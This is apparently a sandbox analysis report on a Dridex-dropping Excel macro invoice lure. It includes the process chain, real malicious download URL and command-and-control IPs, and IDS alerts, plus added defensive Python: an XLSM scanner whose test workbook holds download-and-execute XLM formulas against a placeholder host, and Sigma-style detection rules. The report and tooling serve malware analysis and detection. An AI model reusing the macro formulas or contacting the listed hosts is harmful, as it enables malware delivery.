Analysis Report INV2680371456-20210111889374.xlsm

Overview

General Information

Sample Name:INV2680371456-20210111889374.xlsm
Analysis ID:338309
MD5:9b7c2b0abf5478ef9a23d9a9e87c7835
SHA1:6931c4b845a8a952699d9cf85b316e3b3d826a41
SHA256:a463f9a8842a5c947abaa2bff1b621835ff35f65f9d3272bf1fa5197df9f07d0

Detection

Hidden Macro 4.0
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Document exploit detected (creates forbidden files)
Document exploit detected (drops PE files)
Found malware configuration
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: BlueMashroom DLL Load
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Document contains an embedded VBA macro which may execute processes
Document exploit detected (UrlDownloadToFile)
Document exploit detected (process start blacklist hit)
Found Excel 4.0 Macro with suspicious formulas
Machine Learning detection for dropped file
Office process drops PE file
Sigma detected: Microsoft Office Product Spawning Windows Shell
Sigma detected: Regsvr32 Anomaly
Adds / modifies Windows certificates
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Document contains an embedded VBA macro which executes code when the document is opened / closed
Document contains embedded VBA macros
Downloads executable code via HTTP
Drops PE files
Drops certificate files (DER)
Drops files with a non-matching file extension (content does not match file extension)
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
One or more processes crash
PE file contains sections with non-standard names
PE file contains strange resources
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the installation date of Windows
Registers a DLL
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
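
The verdict above ("Hidden Macro 4.0", "Found Excel 4.0 Macro with suspicious formulas", "Document exploit detected (UrlDownloadToFile)") is what a static triage step looks for in an .xlsm before detonation: a macro sheet whose state is hidden or veryHidden, an Auto_Open defined name that makes Excel run it on open, and XLM formulas that download and execute. The script below is an added example written for this page, not code from Joe Sandbox or from the report. It builds a constructed workbook in memory (the URL, DLL path and sheet names in it are placeholders, not indicators from this sample) and then scans it by reading the OOXML parts of the zip directly, so it runs offline with only the standard library; the function names scan_xlsm and build_sample_xlsm are mine.

```python
import io
import re
import zipfile
import xml.etree.ElementTree as ET

# OOXML namespaces used by xl/workbook.xml and the package relationship parts.
MAIN_NS = "http://schemas.openxmlformats.org/spreadsheetml/2006/main"
REL_NS = "http://schemas.openxmlformats.org/officeDocument/2006/relationships"
PKG_REL_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
MACROSHEET_TYPE = "http://schemas.microsoft.com/office/2006/relationships/xlMacrosheet"

# Excel 4.0 (XLM) functions that download, execute or build further formulas.
SUSPICIOUS = re.compile(
    r"\b(EXEC|CALL|REGISTER|RUN|FORMULA(?:\.FILL|\.ARRAY)?|URLDOWNLOADTOFILEA?|SHELLEXECUTEA?)\b",
    re.IGNORECASE,
)


def _local(tag):
    """Strip the {namespace} prefix ElementTree puts on tag names."""
    return tag.rsplit("}", 1)[-1]


def scan_xlsm(data):
    """Return hidden macrosheets, Auto_Open names and suspicious XLM formulas of an .xlsm."""
    findings = {"hidden_macrosheets": [], "auto_open": [], "suspicious_formulas": []}
    with zipfile.ZipFile(io.BytesIO(data)) as z:
        names = set(z.namelist())
        wb = ET.fromstring(z.read("xl/workbook.xml"))
        rels = {}
        if "xl/_rels/workbook.xml.rels" in names:
            for rel in ET.fromstring(z.read("xl/_rels/workbook.xml.rels")):
                rels[rel.get("Id")] = (rel.get("Type", ""), rel.get("Target", ""))
        # An Auto_Open defined name makes Excel run the XLM sheet as soon as the file opens.
        for dn in wb.iter("{%s}definedName" % MAIN_NS):
            if (dn.get("name") or "").lower().endswith("auto_open"):
                findings["auto_open"].append((dn.get("name"), dn.text))
        for sheet in wb.iter("{%s}sheet" % MAIN_NS):
            rtype, target = rels.get(sheet.get("{%s}id" % REL_NS), ("", ""))
            if rtype != MACROSHEET_TYPE:
                continue  # ordinary worksheet, not an Excel 4.0 macro sheet
            name = sheet.get("name")
            state = sheet.get("state", "visible")  # visible | hidden | veryHidden
            if state != "visible":
                findings["hidden_macrosheets"].append((name, state))
            part = target.lstrip("/") if target.startswith("/") else "xl/" + target
            if part not in names:
                continue
            # Walk every cell of the macrosheet and keep formulas that match the XLM watch list.
            for cell in ET.fromstring(z.read(part)).iter():
                if _local(cell.tag) != "c":
                    continue
                formula = next((ch.text for ch in cell if _local(ch.tag) == "f"), None)
                if formula and SUSPICIOUS.search(formula):
                    findings["suspicious_formulas"].append((name, cell.get("r"), formula))
    return findings


def build_sample_xlsm():
    """Constructed test workbook: one visible sheet plus a veryHidden XLM sheet.
    The URL and DLL path are placeholders, not indicators from a real sample."""
    workbook = (
        '<?xml version="1.0" encoding="UTF-8"?>'
        '<workbook xmlns="%s" xmlns:r="%s"><sheets>'
        '<sheet name="Invoice" sheetId="1" r:id="rId1"/>'
        '<sheet name="Macro1" sheetId="2" state="veryHidden" r:id="rId2"/>'
        '</sheets><definedNames>'
        '<definedName name="_xlnm.Auto_Open" hidden="1">Macro1!$A$1</definedName>'
        '</definedNames></workbook>'
    ) % (MAIN_NS, REL_NS)
    rels = (
        '<?xml version="1.0" encoding="UTF-8"?><Relationships xmlns="%s">'
        '<Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/worksheet" Target="worksheets/sheet1.xml"/>'
        '<Relationship Id="rId2" Type="%s" Target="macrosheets/sheet1.xml"/>'
        '</Relationships>'
    ) % (PKG_REL_NS, MACROSHEET_TYPE)
    macro = (
        r'<?xml version="1.0" encoding="UTF-8"?>'
        r'<xm:macrosheet xmlns="%s" xmlns:xm="http://schemas.microsoft.com/office/excel/2006/main"><sheetData>'
        r'<row r="1"><c r="A1"><f>CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"http://example.invalid/d.rar","C:\Users\Public\a.dll",0,0)</f></c></row>'
        r'<row r="2"><c r="A2"><f>EXEC("regsvr32 -s C:\Users\Public\a.dll")</f></c></row>'
        r'<row r="3"><c r="A3"><f>HALT()</f></c></row>'
        r'</sheetData></xm:macrosheet>'
    ) % MAIN_NS
    worksheet = '<?xml version="1.0" encoding="UTF-8"?><worksheet xmlns="%s"><sheetData/></worksheet>' % MAIN_NS
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("xl/workbook.xml", workbook)
        z.writestr("xl/_rels/workbook.xml.rels", rels)
        z.writestr("xl/worksheets/sheet1.xml", worksheet)
        z.writestr("xl/macrosheets/sheet1.xml", macro)
    return buf.getvalue()


if __name__ == "__main__":
    for key, items in scan_xlsm(build_sample_xlsm()).items():
        print(key)
        for item in items:
            print("   ", item)
```

Two caveats when using this on real lures. The same campaign is often delivered as legacy .xls (BIFF8), where the macro sheet lives inside the OLE workbook stream rather than in OOXML parts, so this parser sees nothing there. And XLM droppers routinely assemble their EXEC/CALL strings at run time with CHAR() and FORMULA(), so an empty suspicious_formulas list on a workbook that still has a veryHidden macrosheet and an Auto_Open name should be read as evasion, not as a clean file.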

Startup

  • System is w7x64
  • EXCEL.EXE (PID: 2292 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)
    • regsvr32.exe (PID: 2500 cmdline: 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\aymakjne.dll. MD5: 59BCE9F07985F8A4204F4D6554CFF708)
      • regsvr32.exe (PID: 2504 cmdline: -s C:\Users\user\AppData\Local\Temp\aymakjne.dll. MD5: 432BE6CF7311062633459EEF6B242FB5)
    • DW20.EXE (PID: 2448 cmdline: 'C:\PROGRA~1\COMMON~1\MICROS~1\DW\DW20.EXE' -x -s 1840 MD5: 45A078B2967E0797360A2D4434C41DB4)
      • DWWIN.EXE (PID: 1296 cmdline: C:\Windows\system32\dwwin.exe -x -s 1840 MD5: 25247E3C4E7A7A73BAEEA6C0008952B1)
  • cleanup

Malware Configuration

Threatname: Dridex

{"Config: ": ["--------------------------------------------------", "BOT ID", "--------------------------------------------------", "Bot id : 61074", "--------------------------------------------------", "IP Address table", "--------------------------------------------------", "Address count 0"]}

Yara Overview

No yara matches

Sigma Overview

System Summary:

Sigma detected: BlueMashroom DLL Load
Source: Process started; Author: Florian Roth; Data: Command: 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\aymakjne.dll., CommandLine: 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\aymakjne.dll., CommandLine|base64offset|contains: , Image: C:\Windows\System32\regsvr32.exe, NewProcessName: C:\Windows\System32\regsvr32.exe, OriginalFileName: C:\Windows\System32\regsvr32.exe, ParentCommandLine: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 2292, ProcessCommandLine: 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\aymakjne.dll., ProcessId: 2500
Sigma detected: Microsoft Office Product Spawning Windows Shell
Source: Process started; Author: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team; Data: Command: 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\aymakjne.dll., CommandLine: 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\aymakjne.dll., CommandLine|base64offset|contains: , Image: C:\Windows\System32\regsvr32.exe, NewProcessName: C:\Windows\System32\regsvr32.exe, OriginalFileName: C:\Windows\System32\regsvr32.exe, ParentCommandLine: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 2292, ProcessCommandLine: 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\aymakjne.dll., ProcessId: 2500
Sigma detected: Regsvr32 Anomaly
Source: Process started; Author: Florian Roth; Data: Command: 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\aymakjne.dll., CommandLine: 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\aymakjne.dll., CommandLine|base64offset|contains: , Image: C:\Windows\System32\regsvr32.exe, NewProcessName: C:\Windows\System32\regsvr32.exe, OriginalFileName: C:\Windows\System32\regsvr32.exe, ParentCommandLine: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 2292, ProcessCommandLine: 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\aymakjne.dll., ProcessId: 2500
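
All three Sigma hits above fire on the same process-creation event: EXCEL.EXE launching regsvr32.exe with -s and a DLL under AppData\Local\Temp. As an added example (not Joe Sandbox code and not the published Sigma rules themselves), the block below re-implements that matching as a minimal evaluator: rules are dicts in Sigma's field|modifier form, all fields of a selection must match, list values are ORed, matching is case-insensitive and '*' is a wildcard. The selection contents are simplified approximations of the public rules carrying these titles, assumed for illustration (Sigma's backslash-escaping rules and the rest of the real rule logic are left out). The first event is taken from the Startup section of this report; the two controls are constructed.

```python
import re

# Minimal Sigma-style rules. The selections approximate the public rules that
# carry these titles; they are assumed for illustration, not the upstream YAML.
RULES = [
    {
        "title": "Microsoft Office Product Spawning Windows Shell",
        "condition": "all",
        "selections": [{
            "ParentImage|endswith": ["\\EXCEL.EXE", "\\WINWORD.EXE", "\\POWERPNT.EXE",
                                     "\\OUTLOOK.EXE", "\\MSACCESS.EXE", "\\MSPUB.EXE"],
            "Image|endswith": ["\\cmd.exe", "\\powershell.exe", "\\wscript.exe", "\\cscript.exe",
                               "\\mshta.exe", "\\regsvr32.exe", "\\rundll32.exe", "\\certutil.exe",
                               "\\msiexec.exe", "\\schtasks.exe"],
        }],
    },
    {
        "title": "Regsvr32 Anomaly",
        "condition": "any",  # Sigma's "1 of selection*"
        "selections": [
            {"Image|endswith": "\\regsvr32.exe", "CommandLine|contains": "\\Temp\\"},
            {"Image|endswith": "\\regsvr32.exe", "ParentImage|endswith": "\\powershell.exe"},
            {"Image|endswith": "\\regsvr32.exe", "CommandLine|contains": ["/i:http", "/i:ftp"]},
        ],
    },
    {
        "title": "BlueMashroom DLL Load",
        "condition": "any",
        "selections": [{"CommandLine|contains": ["\\regsvr32*\\AppData\\Local\\*",
                                                 "\\AppData\\Local\\*,DllEntry*"]}],
    },
]


def _to_regex(pattern):
    """Translate a Sigma value ('*' is the only wildcard) into a regex fragment."""
    return ".*".join(re.escape(part) for part in pattern.split("*"))


def _field_matches(value, pattern, modifier):
    """Apply one field|modifier test; Sigma string matching is case-insensitive."""
    if value is None:
        return False
    rx = _to_regex(pattern)
    if modifier == "contains":
        rx = ".*" + rx + ".*"
    elif modifier == "startswith":
        rx = rx + ".*"
    elif modifier == "endswith":
        rx = ".*" + rx
    return re.fullmatch(rx, value, re.IGNORECASE | re.DOTALL) is not None


def _selection_matches(selection, event):
    """Every field in a selection must match; a list of values is an OR."""
    for key, patterns in selection.items():
        field, _, modifier = key.partition("|")
        if not isinstance(patterns, list):
            patterns = [patterns]
        if not any(_field_matches(event.get(field), p, modifier) for p in patterns):
            return False
    return True


def evaluate(event, rules=RULES):
    """Return the titles of all rules whose condition holds for one event."""
    hits = []
    for rule in rules:
        results = [_selection_matches(s, event) for s in rule["selections"]]
        if all(results) if rule["condition"] == "all" else any(results):
            hits.append(rule["title"])
    return hits


def triage(events, rules=RULES):
    return [evaluate(e, rules) for e in events]


SAMPLE_EVENTS = [
    {   # the chain from the Startup section of this report (EXCEL.EXE -> regsvr32.exe)
        "Image": r"C:\Windows\System32\regsvr32.exe",
        "CommandLine": r"'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\aymakjne.dll.",
        "ParentImage": r"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE",
    },
    {   # constructed benign control: an installer registering a COM DLL
        "Image": r"C:\Windows\System32\regsvr32.exe",
        "CommandLine": r'regsvr32.exe /s "C:\Program Files\Vendor\vendor.dll"',
        "ParentImage": r"C:\Windows\System32\msiexec.exe",
    },
    {   # constructed: Word spawning cmd.exe, no regsvr32 involved
        "Image": r"C:\Windows\System32\cmd.exe",
        "CommandLine": r"cmd.exe /c whoami",
        "ParentImage": r"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE",
    },
]

if __name__ == "__main__":
    for event, hits in zip(SAMPLE_EVENTS, triage(SAMPLE_EVENTS)):
        print(event["CommandLine"], "->", hits or "no match")
```

The point of the three sample events is the contrast: the report's event trips all three titles, the installer-driven regsvr32 (a trusted parent, a DLL under Program Files) trips none, and Word spawning cmd.exe trips only the Office rule. The real rules are YAML with more selections and exceptions, so use a proper engine such as sigma-cli/pySigma in production; this evaluator only shows why the one event in the report produces three alerts.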

Signature Overview

AV Detection:

Antivirus detection for URL or domain
Source: http://truxiellogroup.com/d0l359.rar; Avira URL Cloud: Label: malware
Found malware configuration
Source: 4.2.regsvr32.exe.240000.1.raw.unpack; Malware Configuration Extractor: Dridex {"Config: ": ["--------------------------------------------------", "BOT ID", "--------------------------------------------------", "Bot id : 61074", "--------------------------------------------------", "IP Address table", "--------------------------------------------------", "Address count 0"]}
Multi AV Scanner detection for domain / URL
Source: https://77.220.64.37/; Virustotal: Detection: 7%
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\d0l359[1].rar; ReversingLabs: Detection: 37%
Source: C:\Users\user\AppData\Local\Temp\aymakjne.dll; ReversingLabs: Detection: 37%
Multi AV Scanner detection for submitted file
Source: INV2680371456-20210111889374.xlsm; Virustotal: Detection: 46%
Source: INV2680371456-20210111889374.xlsm; ReversingLabs: Detection: 32%
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\aymakjne.dll; Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\d0l359[1].rar; Joe Sandbox ML: detected

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE; File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: unknown; HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49166 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49171 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49175 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49179 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49183 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49187 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49191 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49195 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49199 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49203 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49207 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49211 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49215 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49219 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49223 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49229 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49233 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49237 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49241 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49245 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49249 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49253 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49257 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49261 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49265 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49269 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49273 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49277 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49281 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49285 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49289 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49293 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49297 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49301 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49305 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49309 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49313 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49317 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49321 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49325 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49329 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49333 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49337 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49341 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49345 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49349 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49353 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49357 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49362 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49366 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49370 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49374 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49378 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49382 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49386 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49390 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49394 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49398 version: TLS 1.2

Software Vulnerabilities:

Document exploit detected (creates forbidden files)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE; File created: C:\Users\user\AppData\Local\Temp\aymakjne.dll
Document exploit detected (drops PE files)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE; File created: d0l359[1].rar.0.dr
Document exploit detected (UrlDownloadToFile)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE; Section loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileA
Document exploit detected (process start blacklist hit)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE; Process created: C:\Windows\System32\regsvr32.exe
Source: global traffic; DNS query: name: truxiellogroup.com
Source: global traffic; TCP traffic: 192.168.2.22:49166 -> 77.220.64.37:443
Source: global traffic; TCP traffic: 192.168.2.22:49165 -> 68.65.122.35:80

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic; Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49166
Source: Traffic; Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49168
Source: Traffic; Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49169
Source: Traffic; Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49169
Source: Traffic; Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49171
Source: Traffic; Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49172
Source: Traffic; Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49173
Source: Traffic; Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49173
Source: Traffic; Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49175
Source: Traffic; Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49176
Source: Traffic; Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49177
Source: Traffic; Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49177
Source: Traffic; Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49179
Source: Traffic; Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49180
Source: Traffic; Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49181
Source: Traffic; Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49181
Source: Traffic; Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49183
Source: Traffic; Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49184
Source: Traffic; Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49185
Source: Traffic; Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49185
Source: Traffic; Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49187
Source: Traffic; Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49188
Source: Traffic; Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49189
Source: Traffic; Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49189
Source: Traffic; Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49191
Source: Traffic; Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49192
Source: Traffic; Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49193
Source: Traffic; Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49193
Source: Traffic; Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49195
Source: Traffic; Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49196
Source: Traffic; Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49197
Source: Traffic; Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49197
Source: Traffic; Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49199
